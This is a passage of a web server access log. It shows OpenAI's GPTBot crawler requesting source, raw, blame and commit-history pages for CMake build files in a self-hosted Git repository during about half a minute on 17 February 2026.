192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" -[17/Feb/2026:16:25:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" [Client 74.7.227.38] [Length 13299] [Gzip 4.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:16:25:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" [Client 74.7.227.38] [Length 9929] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" -[17/Feb/2026:16:25:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" [Client 74.7.227.38] [Length 9954] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" -[17/Feb/2026:16:25:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" [Client 74.7.227.38] [Length 14253] [Gzip 8.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" -[17/Feb/2026:16:25:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" [Client 74.7.227.38] [Length 9957] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" -[17/Feb/2026:16:25:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" [Client 74.7.227.38] [Length 10524] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" -[17/Feb/2026:16:25:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 10006] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" -[17/Feb/2026:16:25:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" [Client 74.7.227.38] [Length 113] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" -[17/Feb/2026:16:25:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks?display=rendered" [Client 74.7.227.38] [Length 11120] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" -[17/Feb/2026:16:25:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 10087] [Gzip 2.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" -[17/Feb/2026:16:25:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" [Client 74.7.227.38] [Length 9953] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" -[17/Feb/2026:16:25:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" [Client 74.7.227.38] [Length 9951] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" -[17/Feb/2026:16:25:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" [Client 74.7.227.38] [Length 2951] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" -[17/Feb/2026:16:25:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" [Client 74.7.227.38] [Length 9953] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" -[17/Feb/2026:16:25:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" [Client 74.7.227.38] [Length 113] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" -[17/Feb/2026:16:25:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" [Client 74.7.227.38] [Length 14031] [Gzip 9.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" -[17/Feb/2026:16:25:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" [Client 74.7.227.38] [Length 10091] [Gzip 2.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" -[17/Feb/2026:16:25:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC" [Client 74.7.227.38] [Length 10266] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10" -[17/Feb/2026:16:25:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" [Client 74.7.227.38] [Length 4694] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" -[17/Feb/2026:16:25:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 2] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" -[17/Feb/2026:16:25:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" [Client 74.7.227.38] [Length 9953] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" -[17/Feb/2026:16:25:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC" [Client 74.7.227.38] [Length 10266] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10" -[17/Feb/2026:16:25:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" [Client 74.7.227.38] [Length 113] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" -[17/Feb/2026:16:25:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" [Client 74.7.227.38] [Length 194] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" -[17/Feb/2026:16:25:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" [Client 74.7.227.38] [Length 11488] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:16:25:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" [Client 74.7.227.38] [Length 4694] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" -[17/Feb/2026:16:25:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" [Client 74.7.227.38] [Length 10092] [Gzip 2.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" -[17/Feb/2026:16:25:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 11166] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles" -[17/Feb/2026:16:25:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" [Client 74.7.227.38] [Length 33373] [Gzip 10.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC" -[17/Feb/2026:16:25:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" [Client 74.7.227.38] [Length 11049] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC" -[17/Feb/2026:16:25:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC" [Client 74.7.227.38] [Length 9958] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC" -[17/Feb/2026:16:25:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" [Client 74.7.227.38] [Length 11158] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:16:25:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" [Client 74.7.227.38] [Length 33372] [Gzip 10.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC" -[17/Feb/2026:16:25:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" [Client 74.7.227.38] [Length 11048] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC" -[17/Feb/2026:16:25:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC" [Client 74.7.227.38] [Length 9958] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC" -[17/Feb/2026:16:25:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" [Client 74.7.227.38] [Length 9954] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" -[17/Feb/2026:16:25:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" [Client 74.7.227.38] [Length 10523] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" -[17/Feb/2026:16:25:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" [Client 74.7.227.38] [Length 194] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" -[17/Feb/2026:16:25:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 10008] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" -[17/Feb/2026:16:25:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" [Client 74.7.227.38] [Length 27620] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" -[17/Feb/2026:16:25:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" [Client 74.7.227.38] [Length 9976] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" -[17/Feb/2026:16:25:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" [Client 74.7.227.38] [Length 9972] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" -[17/Feb/2026:16:25:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" [Client 74.7.227.38] [Length 42449] [Gzip 19.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" -[17/Feb/2026:16:25:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" [Client 74.7.227.38] [Length 27620] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" -[17/Feb/2026:16:25:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" [Client 74.7.227.38] [Length 9976] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" -[17/Feb/2026:16:25:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" [Client 74.7.227.38] [Length 9971] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 